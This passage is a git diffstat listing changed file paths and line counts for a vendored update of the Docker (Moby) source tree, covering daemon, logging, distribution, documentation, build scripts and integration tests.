.../daemon/graphdriver/zfs/zfs_solaris.go | 59 - .../docker/daemon/graphdriver/zfs/zfs_test.go | 4 +- .../daemon/graphdriver/zfs/zfs_unsupported.go | 4 +- .../github.com/docker/docker/daemon/health.go | 98 +- .../docker/docker/daemon/health_test.go | 80 +- .../github.com/docker/docker/daemon/image.go | 76 - .../docker/docker/daemon/image_tag.go | 37 - .../docker/docker/daemon/images/cache.go | 27 + .../docker/docker/daemon/images/image.go | 64 + .../docker/daemon/images/image_builder.go | 219 + .../docker/daemon/images/image_commit.go | 127 + .../daemon/{ => images}/image_delete.go | 126 +- .../docker/daemon/images/image_events.go | 39 + .../daemon/{ => images}/image_exporter.go | 10 +- .../daemon/{ => images}/image_history.go | 29 +- .../{import.go => images/image_import.go} | 61 +- .../daemon/{ => images}/image_inspect.go | 52 +- .../docker/daemon/images/image_prune.go | 211 + .../docker/daemon/{ => images}/image_pull.go | 86 +- .../docker/daemon/{ => images}/image_push.go | 29 +- .../{search.go => images/image_search.go} | 33 +- .../image_search_test.go} | 17 +- .../docker/docker/daemon/images/image_tag.go | 41 + .../docker/docker/daemon/images/image_unix.go | 45 + .../docker/daemon/images/image_windows.go | 41 + .../docker/daemon/{ => images}/images.go | 99 +- .../docker/docker/daemon/images/locals.go | 32 + .../docker/docker/daemon/images/service.go | 251 + .../github.com/docker/docker/daemon/info.go | 98 +- .../docker/docker/daemon/info_unix.go | 77 +- .../docker/docker/daemon/info_unix_test.go | 53 + .../docker/docker/daemon/info_windows.go | 2 +- .../docker/daemon/initlayer/setup_solaris.go | 13 - .../docker/daemon/initlayer/setup_unix.go | 18 +- .../docker/daemon/initlayer/setup_windows.go | 9 +- .../docker/docker/daemon/inspect.go | 89 +- .../{inspect_unix.go => inspect_linux.go} | 23 +- .../docker/docker/daemon/inspect_solaris.go | 41 - .../docker/docker/daemon/inspect_test.go | 33 + .../docker/docker/daemon/inspect_windows.go | 17 +- .../github.com/docker/docker/daemon/keys.go | 2 +- .../docker/docker/daemon/keys_unsupported.go | 4 +- .../github.com/docker/docker/daemon/kill.go | 68 +- .../github.com/docker/docker/daemon/links.go | 10 +- .../docker/docker/daemon/links/links.go | 2 +- .../docker/docker/daemon/links/links_test.go | 18 +- .../docker/docker/daemon/links_linux.go | 72 - .../docker/docker/daemon/links_linux_test.go | 98 - .../docker/docker/daemon/links_notlinux.go | 10 - .../github.com/docker/docker/daemon/list.go | 441 +- .../docker/docker/daemon/list_test.go | 26 + .../docker/docker/daemon/list_unix.go | 6 +- .../docker/docker/daemon/list_windows.go | 4 +- .../docker/daemon/listeners/group_unix.go | 34 + .../listeners/listeners_linux.go} | 28 +- .../listeners/listeners_windows.go | 2 +- .../docker/docker/daemon/logdrivers_linux.go | 2 +- .../docker/daemon/logdrivers_windows.go | 3 +- .../docker/docker/daemon/logger/adapter.go | 139 + .../docker/daemon/logger/adapter_test.go | 216 + .../daemon/logger/awslogs/cloudwatchlogs.go | 522 +- .../logger/awslogs/cloudwatchlogs_test.go | 739 +- .../logger/awslogs/cwlogsiface_mock_test.go | 46 +- .../docker/docker/daemon/logger/copier.go | 77 +- .../docker/daemon/logger/copier_test.go | 202 +- .../daemon/logger/etwlogs/etwlogs_windows.go | 58 +- .../docker/docker/daemon/logger/factory.go | 72 +- .../docker/daemon/logger/fluentd/fluentd.go | 89 +- .../daemon/logger/gcplogs/gcplogging.go | 144 +- .../daemon/logger/gcplogs/gcplogging_linux.go | 29 + .../logger/gcplogs/gcplogging_others.go | 7 + .../docker/docker/daemon/logger/gelf/gelf.go | 147 +- .../docker/daemon/logger/gelf/gelf_test.go | 260 + .../daemon/logger/gelf/gelf_unsupported.go | 3 - .../docker/daemon/logger/journald/journald.go | 43 +- .../daemon/logger/journald/journald_test.go | 2 +- .../logger/journald/journald_unsupported.go | 2 +- .../docker/daemon/logger/journald/read.go | 116 +- .../daemon/logger/journald/read_native.go | 2 +- .../logger/journald/read_native_compat.go | 2 +- .../logger/journald/read_unsupported.go | 2 +- .../daemon/logger/jsonfilelog/jsonfilelog.go | 112 +- .../logger/jsonfilelog/jsonfilelog_test.go | 222 +- .../logger/jsonfilelog/jsonlog/jsonlog.go | 25 + .../jsonfilelog}/jsonlog/jsonlogbytes.go | 31 +- .../jsonfilelog/jsonlog/jsonlogbytes_test.go | 51 + .../jsonfilelog/jsonlog/time_marshalling.go | 20 + .../jsonlog/time_marshalling_test.go | 34 + .../docker/daemon/logger/jsonfilelog/read.go | 316 +- .../daemon/logger/jsonfilelog/read_test.go | 64 + .../daemon/logger/logentries/logentries.go | 61 +- .../docker/docker/daemon/logger/logger.go | 119 +- .../docker/daemon/logger/logger_test.go | 29 +- .../daemon/logger/loggerutils/log_tag.go | 10 +- .../daemon/logger/loggerutils/log_tag_test.go | 20 +- .../daemon/logger/loggerutils/logfile.go | 666 ++ .../loggerutils/multireader}/multireader.go | 29 +- .../multireader}/multireader_test.go | 20 +- .../logger/loggerutils/rotatefilewriter.go | 124 - .../daemon/logger/{context.go => loginfo.go} | 78 +- .../docker/docker/daemon/logger/metrics.go | 21 + .../docker/docker/daemon/logger/plugin.go | 116 + .../docker/daemon/logger/plugin_unix.go | 23 + .../daemon/logger/plugin_unsupported.go | 12 + .../docker/docker/daemon/logger/proxy.go | 107 + .../docker/docker/daemon/logger/ring.go | 223 + .../docker/docker/daemon/logger/ring_test.go | 299 + .../docker/daemon/logger/splunk/splunk.go | 114 +- .../daemon/logger/splunk/splunk_test.go | 251 +- .../logger/splunk/splunkhecmock_test.go | 29 +- .../docker/daemon/logger/syslog/syslog.go | 32 +- .../daemon/logger/syslog/syslog_test.go | 2 +- .../daemon/logger/templates/templates.go | 50 + .../daemon/logger/templates/templates_test.go | 19 + .../github.com/docker/docker/daemon/logs.go | 209 +- .../docker/docker/daemon/logs_test.go | 2 +- .../docker/docker/daemon/metrics.go | 166 +- .../docker/docker/daemon/metrics_unix.go | 60 + .../docker/daemon/metrics_unsupported.go | 12 + .../docker/docker/daemon/monitor.go | 250 +- .../docker/docker/daemon/monitor_linux.go | 19 - .../docker/docker/daemon/monitor_solaris.go | 18 - .../docker/docker/daemon/monitor_windows.go | 46 - .../github.com/docker/docker/daemon/mounts.go | 45 +- .../github.com/docker/docker/daemon/names.go | 39 +- .../docker/{utils => daemon/names}/names.go | 2 +- .../docker/docker/daemon/network.go | 698 +- .../docker/docker/daemon/network/settings.go | 38 +- vendor/github.com/docker/docker/daemon/oci.go | 78 + .../docker/docker/daemon/oci_linux.go | 415 +- .../docker/docker/daemon/oci_linux_test.go | 102 + .../docker/docker/daemon/oci_solaris.go | 188 - .../docker/docker/daemon/oci_windows.go | 359 +- .../github.com/docker/docker/daemon/pause.go | 26 +- .../github.com/docker/docker/daemon/prune.go | 344 +- .../github.com/docker/docker/daemon/reload.go | 324 + .../docker/docker/daemon/reload_test.go | 573 ++ .../docker/docker/daemon/reload_unix.go | 56 + .../docker/docker/daemon/reload_windows.go | 9 + .../github.com/docker/docker/daemon/rename.go | 35 +- .../github.com/docker/docker/daemon/resize.go | 18 +- .../docker/docker/daemon/resize_test.go | 103 + .../docker/docker/daemon/restart.go | 6 +- .../docker/docker/daemon/seccomp_disabled.go | 2 +- .../docker/docker/daemon/seccomp_linux.go | 6 +- .../docker/daemon/seccomp_unsupported.go | 2 +- .../docker/docker/daemon/secrets.go | 17 +- .../docker/docker/daemon/secrets_linux.go | 4 +- .../docker/daemon/secrets_unsupported.go | 4 +- .../docker/docker/daemon/secrets_windows.go | 5 + .../docker/docker/daemon/selinux_linux.go | 10 +- .../docker/daemon/selinux_unsupported.go | 2 +- .../github.com/docker/docker/daemon/start.go | 164 +- .../docker/docker/daemon/start_unix.go | 50 +- .../docker/docker/daemon/start_windows.go | 217 +- .../github.com/docker/docker/daemon/stats.go | 17 +- .../docker/docker/daemon/stats/collector.go | 159 + .../collector_unix.go} | 32 +- .../docker/daemon/stats/collector_windows.go | 17 + .../docker/docker/daemon/stats_collector.go | 132 +- .../docker/daemon/stats_collector_solaris.go | 34 - .../docker/daemon/stats_collector_windows.go | 15 - .../docker/docker/daemon/stats_unix.go | 7 +- .../docker/docker/daemon/stats_windows.go | 2 +- .../github.com/docker/docker/daemon/stop.go | 68 +- .../{api/fixtures => daemon/testdata}/keyfile | 0 .../docker/docker/daemon/top_unix.go | 101 +- .../docker/docker/daemon/top_unix_test.go | 15 +- .../docker/docker/daemon/top_windows.go | 20 +- .../docker/docker/daemon/trustkey.go | 57 + .../docker/docker/daemon/trustkey_test.go | 71 + .../docker/docker/daemon/unpause.go | 22 +- .../github.com/docker/docker/daemon/update.go | 45 +- .../docker/docker/daemon/update_linux.go | 59 +- .../docker/docker/daemon/update_solaris.go | 11 - .../docker/docker/daemon/update_windows.go | 10 +- .../docker/docker/daemon/util_test.go | 65 + .../docker/docker/daemon/volumes.go | 334 +- .../docker/docker/daemon/volumes_linux.go | 36 + .../docker/daemon/volumes_linux_test.go | 56 + .../docker/docker/daemon/volumes_unit_test.go | 9 +- .../docker/docker/daemon/volumes_unix.go | 111 +- .../docker/docker/daemon/volumes_unix_test.go | 256 + .../docker/docker/daemon/volumes_windows.go | 20 +- .../github.com/docker/docker/daemon/wait.go | 37 +- .../docker/docker/daemon/workdir.go | 7 +- .../docker/docker/distribution/config.go | 56 +- .../docker/docker/distribution/errors.go | 93 +- .../docker/docker/distribution/errors_test.go | 85 + .../docker/distribution/metadata/metadata.go | 2 +- .../distribution/metadata/v1_id_service.go | 2 +- .../metadata/v1_id_service_test.go | 7 +- .../metadata/v2_metadata_service.go | 10 +- .../metadata/v2_metadata_service_test.go | 4 +- .../docker/docker/distribution/pull.go | 50 +- .../docker/docker/distribution/pull_v1.go | 57 +- .../docker/docker/distribution/pull_v2.go | 279 +- .../docker/distribution/pull_v2_test.go | 15 +- .../docker/distribution/pull_v2_unix.go | 25 +- .../docker/distribution/pull_v2_windows.go | 103 +- .../docker/docker/distribution/push.go | 24 +- .../docker/docker/distribution/push_v1.go | 58 +- .../docker/docker/distribution/push_v2.go | 146 +- .../docker/distribution/push_v2_test.go | 219 +- .../docker/docker/distribution/registry.go | 16 +- .../docker/distribution/registry_unit_test.go | 24 +- .../docker/distribution/utils/progress.go | 6 +- .../docker/distribution/xfer/download.go | 70 +- .../docker/distribution/xfer/download_test.go | 24 +- .../docker/distribution/xfer/transfer.go | 6 +- .../docker/distribution/xfer/transfer_test.go | 2 +- .../docker/docker/distribution/xfer/upload.go | 24 +- .../docker/distribution/xfer/upload_test.go | 8 +- .../docker/docker/dockerversion/useragent.go | 16 +- .../docker/dockerversion/version_lib.go | 17 +- .../github.com/docker/docker/docs/README.md | 30 - .../docker/docker/docs/api/v1.18.md | 39 +- .../docker/docker/docs/api/v1.19.md | 39 +- .../docker/docker/docs/api/v1.20.md | 37 +- .../docker/docker/docs/api/v1.21.md | 60 +- .../docker/docker/docs/api/v1.22.md | 62 +- .../docker/docker/docs/api/v1.23.md | 73 +- .../docker/docker/docs/api/v1.24.md | 105 +- .../docker/docker/docs/api/version-history.md | 179 +- .../docker/docker/docs/contributing/README.md | 8 + .../docs/contributing/images/branch-sig.png | Bin 0 -> 56537 bytes .../contributing/images/contributor-edit.png | Bin 0 -> 17933 bytes .../docs/contributing/images/copy_url.png | Bin 0 -> 69486 bytes .../docs/contributing/images/fork_docker.png | Bin 0 -> 52190 bytes .../docs/contributing/images/git_bash.png | Bin 0 -> 26097 bytes .../docs/contributing/images/list_example.png | Bin 0 -> 51194 bytes .../docs/contributing/set-up-dev-env.md | 372 + .../docker/docs/contributing/set-up-git.md | 280 + .../docs/contributing/software-req-win.md | 177 + .../docs/contributing/software-required.md | 94 + .../docker/docker/docs/contributing/test.md | 244 + .../docs/contributing/who-written-for.md | 49 + .../docker/docker/docs/deprecated.md | 286 - .../docker/docker/docs/extend/EBS_volume.md | 164 - .../docker/docker/docs/extend/config.md | 225 - .../extend/images/authz_additional_info.png | Bin 45916 -> 0 bytes .../docker/docs/extend/images/authz_allow.png | Bin 33505 -> 0 bytes .../docs/extend/images/authz_chunked.png | Bin 33168 -> 0 bytes .../extend/images/authz_connection_hijack.png | Bin 38780 -> 0 bytes .../docker/docs/extend/images/authz_deny.png | Bin 27099 -> 0 bytes .../docker/docker/docs/extend/index.md | 222 - .../docker/docs/extend/legacy_plugins.md | 98 - .../docker/docker/docs/extend/plugin_api.md | 196 - .../docs/extend/plugins_authorization.md | 260 - .../docker/docs/extend/plugins_graphdriver.md | 376 - .../docker/docs/extend/plugins_network.md | 77 - .../docker/docs/extend/plugins_volume.md | 276 - .../docker/docker/docs/reference/builder.md | 1746 ----- .../docs/reference/commandline/attach.md | 131 - .../docs/reference/commandline/build.md | 451 -- .../docker/docs/reference/commandline/cli.md | 249 - .../docs/reference/commandline/commit.md | 93 - .../reference/commandline/container_prune.md | 47 - .../docker/docs/reference/commandline/cp.md | 112 - .../docs/reference/commandline/create.md | 211 - .../docs/reference/commandline/deploy.md | 101 - .../docker/docs/reference/commandline/diff.md | 48 - .../reference/commandline/docker_images.gif | Bin 35785 -> 0 bytes .../docs/reference/commandline/dockerd.md | 1364 ---- .../docs/reference/commandline/events.md | 217 - .../docker/docs/reference/commandline/exec.md | 65 - .../docs/reference/commandline/export.md | 43 - .../docs/reference/commandline/history.md | 48 - .../docs/reference/commandline/image_prune.md | 71 - .../docs/reference/commandline/images.md | 304 - .../docs/reference/commandline/import.md | 75 - .../docs/reference/commandline/index.md | 178 - .../docker/docs/reference/commandline/info.md | 224 - .../docs/reference/commandline/inspect.md | 102 - .../docker/docs/reference/commandline/kill.md | 34 - .../docker/docs/reference/commandline/load.md | 53 - .../docs/reference/commandline/login.md | 122 - .../docs/reference/commandline/logout.md | 30 - .../docker/docs/reference/commandline/logs.md | 66 - .../docker/docs/reference/commandline/menu.md | 28 - .../reference/commandline/network_connect.md | 100 - .../reference/commandline/network_create.md | 202 - .../commandline/network_disconnect.md | 43 - .../reference/commandline/network_inspect.md | 192 - .../docs/reference/commandline/network_ls.md | 218 - .../reference/commandline/network_prune.md | 45 - .../docs/reference/commandline/network_rm.md | 59 - .../docs/reference/commandline/node_demote.md | 42 - .../reference/commandline/node_inspect.md | 137 - .../docs/reference/commandline/node_ls.md | 130 - .../reference/commandline/node_promote.md | 41 - .../docs/reference/commandline/node_ps.md | 107 - .../docs/reference/commandline/node_rm.md | 73 - .../docs/reference/commandline/node_update.md | 71 - .../docs/reference/commandline/pause.md | 40 - .../reference/commandline/plugin_create.md | 60 - .../reference/commandline/plugin_disable.md | 66 - .../reference/commandline/plugin_enable.md | 65 - .../reference/commandline/plugin_inspect.md | 164 - .../reference/commandline/plugin_install.md | 71 - .../docs/reference/commandline/plugin_ls.md | 53 - .../docs/reference/commandline/plugin_push.md | 50 - .../docs/reference/commandline/plugin_rm.md | 56 - .../docs/reference/commandline/plugin_set.md | 99 - .../reference/commandline/plugin_upgrade.md | 84 - .../docker/docs/reference/commandline/port.md | 41 - .../docker/docs/reference/commandline/ps.md | 384 - .../docker/docs/reference/commandline/pull.md | 252 - .../docker/docs/reference/commandline/push.md | 75 - .../docs/reference/commandline/rename.md | 27 - .../docs/reference/commandline/restart.md | 26 - .../docker/docs/reference/commandline/rm.md | 69 - .../docker/docs/reference/commandline/rmi.md | 83 - .../docker/docs/reference/commandline/run.md | 732 -- .../docker/docs/reference/commandline/save.md | 45 - .../docs/reference/commandline/search.md | 134 - .../reference/commandline/secret_create.md | 90 - .../reference/commandline/secret_inspect.md | 85 - .../docs/reference/commandline/secret_ls.md | 43 - .../docs/reference/commandline/secret_rm.md | 48 - .../reference/commandline/service_create.md | 556 -- .../reference/commandline/service_inspect.md | 162 - .../reference/commandline/service_logs.md | 77 - .../docs/reference/commandline/service_ls.md | 114 - .../docs/reference/commandline/service_ps.md | 161 - .../docs/reference/commandline/service_rm.md | 55 - .../reference/commandline/service_scale.md | 96 - .../reference/commandline/service_update.md | 181 - .../reference/commandline/stack_deploy.md | 98 - .../docs/reference/commandline/stack_ls.md | 47 - .../docs/reference/commandline/stack_ps.md | 51 - .../docs/reference/commandline/stack_rm.md | 38 - .../reference/commandline/stack_services.md | 70 - .../docs/reference/commandline/start.md | 28 - .../docs/reference/commandline/stats.md | 117 - .../docker/docs/reference/commandline/stop.md | 29 - .../docs/reference/commandline/swarm_init.md | 142 - .../docs/reference/commandline/swarm_join.md | 102 - .../reference/commandline/swarm_join_token.md | 105 - .../docs/reference/commandline/swarm_leave.md | 58 - .../reference/commandline/swarm_unlock.md | 41 - .../reference/commandline/swarm_unlock_key.md | 84 - .../reference/commandline/swarm_update.md | 45 - .../docs/reference/commandline/system_df.md | 76 - .../reference/commandline/system_prune.md | 79 - .../docker/docs/reference/commandline/tag.md | 74 - .../docker/docs/reference/commandline/top.md | 25 - .../docs/reference/commandline/unpause.md | 36 - .../docs/reference/commandline/update.md | 120 - .../docs/reference/commandline/version.md | 67 - .../reference/commandline/volume_create.md | 91 - .../reference/commandline/volume_inspect.md | 59 - .../docs/reference/commandline/volume_ls.md | 183 - .../reference/commandline/volume_prune.md | 54 - .../docs/reference/commandline/volume_rm.md | 42 - .../docker/docs/reference/commandline/wait.md | 25 - .../docker/docker/docs/reference/glossary.md | 286 - .../docker/docker/docs/reference/index.md | 21 - .../docker/docker/docs/reference/run.md | 1555 ----- .../static_files/docker-logo-compressed.png | Bin 4972 -> 0 bytes .../docs/static_files/moby-project-logo.png | Bin 0 -> 20458 bytes .../github.com/docker/docker/errdefs/defs.go | 74 + .../github.com/docker/docker/errdefs/doc.go | 8 + .../docker/docker/errdefs/helpers.go | 240 + .../docker/docker/errdefs/helpers_test.go | 194 + vendor/github.com/docker/docker/errdefs/is.go | 114 + .../docker/docker/experimental/README.md | 44 - .../docker/experimental/checkpoint-restore.md | 88 - .../experimental/docker-stacks-and-bundles.md | 202 - .../experimental/images/ipvlan-l3.gliffy | 1 - .../docker/experimental/images/ipvlan-l3.png | Bin 18260 -> 0 bytes .../docker/experimental/images/ipvlan-l3.svg | 1 - .../images/ipvlan_l2_simple.gliffy | 1 - .../experimental/images/ipvlan_l2_simple.png | Bin 20145 -> 0 bytes .../experimental/images/ipvlan_l2_simple.svg | 1 - .../images/macvlan-bridge-ipvlan-l2.gliffy | 1 - .../images/macvlan-bridge-ipvlan-l2.png | Bin 14527 -> 0 bytes .../images/macvlan-bridge-ipvlan-l2.svg | 1 - .../images/multi_tenant_8021q_vlans.gliffy | 1 - .../images/multi_tenant_8021q_vlans.png | Bin 17879 -> 0 bytes .../images/multi_tenant_8021q_vlans.svg | 1 - .../images/vlans-deeper-look.gliffy | 1 - .../experimental/images/vlans-deeper-look.png | Bin 38837 -> 0 bytes .../experimental/images/vlans-deeper-look.svg | 1 - .../docker/experimental/vlan-networks.md | 471 -- .../docker/hack/Jenkins/W2L/postbuild.sh | 35 - .../docker/docker/hack/Jenkins/W2L/setup.sh | 309 - .../docker/docker/hack/Jenkins/readme.md | 3 - .../github.com/docker/docker/hack/README.md | 55 + vendor/github.com/docker/docker/hack/ci/arm | 10 + .../docker/docker/hack/ci/experimental | 9 + vendor/github.com/docker/docker/hack/ci/janky | 17 + .../github.com/docker/docker/hack/ci/powerpc | 6 + vendor/github.com/docker/docker/hack/ci/z | 6 + vendor/github.com/docker/docker/hack/dind | 2 +- .../docker/hack/dockerfile/binaries-commits | 11 - .../hack/dockerfile/install-binaries.sh | 123 - .../dockerfile/install/containerd.installer | 36 + .../dockerfile/install/dockercli.installer | 31 + .../dockerfile/install/gometalinter.installer | 12 + .../docker/hack/dockerfile/install/install.sh | 30 + .../hack/dockerfile/install/proxy.installer | 38 + .../hack/dockerfile/install/runc.installer | 22 + .../hack/dockerfile/install/tini.installer | 14 + .../hack/dockerfile/install/tomlv.installer | 12 + .../hack/dockerfile/install/vndr.installer | 11 + .../docker/docker/hack/generate-authors.sh | 2 +- .../docker/hack/generate-swagger-api.sh | 23 +- .../github.com/docker/docker/hack/install.sh | 484 -- .../hack/integration-cli-on-swarm/README.md | 69 + .../integration-cli-on-swarm/agent/Dockerfile | 6 + .../agent/master/call.go | 132 + .../agent/master/master.go | 65 + .../agent/master/set.go | 28 + .../agent/master/set_test.go | 63 + .../agent/types/types.go | 18 + .../agent/vendor.conf | 2 + .../agent/worker/executor.go | 118 + .../agent/worker/worker.go | 69 + .../integration-cli-on-swarm/host/compose.go | 122 + .../host/dockercmd.go | 64 + .../host/enumerate.go | 55 + .../host/enumerate_test.go | 84 + .../integration-cli-on-swarm/host/host.go | 198 + .../integration-cli-on-swarm/host/volume.go | 88 + vendor/github.com/docker/docker/hack/make.ps1 | 123 +- vendor/github.com/docker/docker/hack/make.sh | 140 +- .../docker/docker/hack/make/.binary | 45 +- .../docker/docker/hack/make/.binary-setup | 3 +- .../docker/docker/hack/make/.build-deb/compat | 1 - .../docker/hack/make/.build-deb/control | 29 - .../.build-deb/docker-engine.bash-completion | 1 - .../.build-deb/docker-engine.docker.default | 1 - .../make/.build-deb/docker-engine.docker.init | 1 - .../.build-deb/docker-engine.docker.upstart | 1 - .../make/.build-deb/docker-engine.install | 12 - .../make/.build-deb/docker-engine.manpages | 1 - .../make/.build-deb/docker-engine.postinst | 20 - .../hack/make/.build-deb/docker-engine.udev | 1 - .../docker/docker/hack/make/.build-deb/docs | 1 - .../docker/docker/hack/make/.build-deb/rules | 55 - .../.build-rpm/docker-engine-selinux.spec | 96 - .../hack/make/.build-rpm/docker-engine.spec | 254 - .../docker/hack/make/.detect-daemon-osarch | 50 +- .../docker/docker/hack/make/.ensure-emptyfs | 28 +- .../docker/docker/hack/make/.go-autogen | 13 +- .../docker/docker/hack/make/.go-autogen.ps1 | 6 +- .../hack/make/.integration-daemon-setup | 6 +- .../hack/make/.integration-daemon-start | 54 +- .../docker/hack/make/.integration-daemon-stop | 13 +- .../hack/make/.integration-test-helpers | 139 +- .../docker/docker/hack/make/README.md | 3 +- .../github.com/docker/docker/hack/make/binary | 7 +- .../docker/docker/hack/make/binary-client | 12 - .../docker/docker/hack/make/binary-daemon | 34 +- .../docker/docker/hack/make/build-deb | 91 - .../hack/make/build-integration-test-binary | 12 +- .../docker/docker/hack/make/build-rpm | 148 - .../docker/docker/hack/make/clean-apt-repo | 43 - .../docker/docker/hack/make/clean-yum-repo | 20 - .../github.com/docker/docker/hack/make/cover | 15 - .../github.com/docker/docker/hack/make/cross | 33 +- .../docker/docker/hack/make/dynbinary | 7 +- .../docker/docker/hack/make/dynbinary-client | 12 - .../docker/docker/hack/make/dynbinary-daemon | 4 +- .../docker/hack/make/generate-index-listing | 74 - .../docker/docker/hack/make/install-binary | 27 +- .../docker/hack/make/install-binary-client | 10 - .../docker/hack/make/install-binary-daemon | 16 - .../docker/docker/hack/make/install-script | 63 - .../docker/docker/hack/make/release-deb | 163 - .../docker/docker/hack/make/release-rpm | 71 - vendor/github.com/docker/docker/hack/make/run | 6 +- .../docker/docker/hack/make/sign-repos | 65 - .../docker/docker/hack/make/test-deb-install | 71 - .../docker/docker/hack/make/test-docker-py | 2 +- .../docker/hack/make/test-install-script | 31 - .../docker/docker/hack/make/test-integration | 21 + .../docker/hack/make/test-integration-cli | 30 +- .../docker/hack/make/test-integration-shell | 4 +- .../docker/docker/hack/make/test-old-apt-repo | 29 - .../docker/docker/hack/make/test-unit | 55 - vendor/github.com/docker/docker/hack/make/tgz | 92 - .../github.com/docker/docker/hack/make/ubuntu | 190 - .../docker/docker/hack/make/update-apt-repo | 70 - vendor/github.com/docker/docker/hack/make/win | 20 - .../github.com/docker/docker/hack/release.sh | 325 - .../docker/docker/hack/test/e2e-run.sh | 72 + .../github.com/docker/docker/hack/test/unit | 38 + .../docker/docker/hack/validate/.validate | 2 +- .../docker/docker/hack/validate/all | 2 +- .../hack/validate/changelog-date-descending | 12 + .../hack/validate/changelog-well-formed | 25 + .../docker/hack/validate/compose-bindata | 28 - .../docker/docker/hack/validate/dco | 2 +- .../docker/docker/hack/validate/default | 9 +- .../docker/hack/validate/default-seccomp | 2 +- .../hack/validate/deprecate-integration-cli | 25 + .../docker/docker/hack/validate/gofmt | 33 - .../docker/docker/hack/validate/gometalinter | 13 + .../docker/hack/validate/gometalinter.json | 27 + .../docker/docker/hack/validate/lint | 31 - .../docker/docker/hack/validate/pkg-imports | 2 +- .../docker/docker/hack/validate/swagger | 2 +- .../docker/docker/hack/validate/swagger-gen | 4 +- .../docker/docker/hack/validate/test-imports | 2 +- .../docker/docker/hack/validate/toml | 2 +- .../docker/docker/hack/validate/vendor | 71 +- .../docker/docker/hack/validate/vet | 32 - .../github.com/docker/docker/hack/vendor.sh | 2 +- .../docker/{daemon => image/cache}/cache.go | 263 +- .../{runconfig => image/cache}/compare.go | 10 +- .../cache}/compare_test.go | 52 +- vendor/github.com/docker/docker/image/fs.go | 30 +- .../github.com/docker/docker/image/fs_test.go | 344 +- .../github.com/docker/docker/image/image.go | 112 +- .../docker/docker/image/image_test.go | 98 +- .../github.com/docker/docker/image/rootfs.go | 12 +- .../docker/docker/image/spec/README.md | 46 + .../docker/docker/image/spec/v1.1.md | 22 +- .../docker/docker/image/spec/v1.2.md | 35 +- .../github.com/docker/docker/image/spec/v1.md | 43 +- .../github.com/docker/docker/image/store.go | 100 +- .../docker/docker/image/store_test.go | 331 +- .../docker/docker/image/tarexport/load.go | 101 +- .../docker/docker/image/tarexport/save.go | 176 +- .../docker/image/tarexport/tarexport.go | 14 +- .../docker/docker/image/v1/imagev1.go | 18 +- .../docker/docker/image/v1/imagev1_test.go | 2 +- .../docker/integration-cli/benchmark_test.go | 2 +- .../docker/integration-cli/check_test.go | 278 +- .../checker/checker.go | 2 +- .../docker/integration-cli/cli/build/build.go | 82 + .../docker/docker/integration-cli/cli/cli.go | 226 + .../docker/docker/integration-cli/daemon.go | 608 -- .../docker/integration-cli/daemon/daemon.go | 143 + .../integration-cli/daemon/daemon_swarm.go | 197 + .../docker/integration-cli/daemon_swarm.go | 419 -- ...warm_hack.go => daemon_swarm_hack_test.go} | 9 +- .../docker/integration-cli/daemon_unix.go | 35 - .../docker/integration-cli/daemon_windows.go | 53 - .../integration-cli/docker_api_attach_test.go | 98 +- .../integration-cli/docker_api_auth_test.go | 25 - .../integration-cli/docker_api_build_test.go | 372 +- .../docker_api_build_windows_test.go | 39 + .../docker_api_containers_test.go | 1692 +++-- .../docker_api_containers_windows_test.go | 76 + .../integration-cli/docker_api_create_test.go | 152 +- .../integration-cli/docker_api_events_test.go | 73 - .../docker_api_exec_resize_test.go | 42 +- .../integration-cli/docker_api_exec_test.go | 209 +- .../integration-cli/docker_api_images_test.go | 150 +- .../integration-cli/docker_api_info_test.go | 53 - .../docker_api_inspect_test.go | 26 +- .../docker_api_inspect_unix_test.go | 35 - .../docker_api_ipcmode_test.go | 213 + .../integration-cli/docker_api_logs_test.go | 163 +- .../docker_api_network_test.go | 149 +- .../integration-cli/docker_api_resize_test.go | 44 - .../docker_api_service_update_test.go | 39 - .../integration-cli/docker_api_stats_test.go | 52 +- .../docker_api_stats_unix_test.go | 41 - .../docker_api_swarm_node_test.go | 127 + .../docker_api_swarm_service_test.go | 612 ++ .../integration-cli/docker_api_swarm_test.go | 1223 ++-- .../docker/integration-cli/docker_api_test.go | 72 +- .../docker_api_update_unix_test.go | 35 - .../docker_api_version_test.go | 23 - .../docker_api_volumes_test.go | 89 - .../integration-cli/docker_cli_attach_test.go | 25 +- .../docker_cli_attach_unix_test.go | 24 +- .../docker_cli_authz_plugin_v2_test.go | 133 - .../docker_cli_authz_unix_test.go | 477 -- .../integration-cli/docker_cli_build_test.go | 6169 +++++++---------- .../docker_cli_build_unix_test.go | 81 +- .../docker_cli_by_digest_test.go | 76 +- .../integration-cli/docker_cli_commit_test.go | 37 +- .../docker_cli_config_create_test.go | 131 + .../integration-cli/docker_cli_config_test.go | 140 - .../docker_cli_cp_from_container_test.go | 133 +- .../integration-cli/docker_cli_cp_test.go | 20 +- .../docker_cli_cp_to_container_test.go | 150 +- .../docker_cli_cp_to_container_unix_test.go | 46 +- ...p_utils.go => docker_cli_cp_utils_test.go} | 90 +- .../integration-cli/docker_cli_create_test.go | 211 +- .../docker_cli_daemon_plugins_test.go | 209 +- .../integration-cli/docker_cli_daemon_test.go | 1707 ++--- .../integration-cli/docker_cli_diff_test.go | 98 - .../integration-cli/docker_cli_events_test.go | 125 +- .../docker_cli_events_unix_test.go | 65 +- .../integration-cli/docker_cli_exec_test.go | 136 +- .../docker_cli_exec_unix_test.go | 12 +- .../docker_cli_experimental_test.go | 36 - .../docker_cli_export_import_test.go | 39 +- ...er_cli_external_volume_driver_unix_test.go | 122 +- .../integration-cli/docker_cli_health_test.go | 86 +- .../integration-cli/docker_cli_help_test.go | 321 - .../docker_cli_history_test.go | 12 +- .../integration-cli/docker_cli_images_test.go | 102 +- .../integration-cli/docker_cli_import_test.go | 52 +- .../integration-cli/docker_cli_info_test.go | 102 +- .../docker_cli_info_unix_test.go | 2 +- .../docker_cli_inspect_test.go | 68 +- .../integration-cli/docker_cli_kill_test.go | 134 - .../integration-cli/docker_cli_links_test.go | 49 +- .../docker_cli_links_unix_test.go | 26 - .../integration-cli/docker_cli_login_test.go | 22 +- .../integration-cli/docker_cli_logout_test.go | 26 +- .../integration-cli/docker_cli_logs_test.go | 144 +- .../integration-cli/docker_cli_nat_test.go | 93 - .../docker_cli_netmode_test.go | 8 +- .../docker_cli_network_unix_test.go | 286 +- .../docker_cli_oom_killed_test.go | 30 - .../integration-cli/docker_cli_pause_test.go | 66 - .../docker_cli_plugins_logdriver_test.go | 48 + .../docker_cli_plugins_test.go | 268 +- .../integration-cli/docker_cli_port_test.go | 40 +- .../integration-cli/docker_cli_proxy_test.go | 36 +- .../docker_cli_prune_unix_test.go | 250 +- 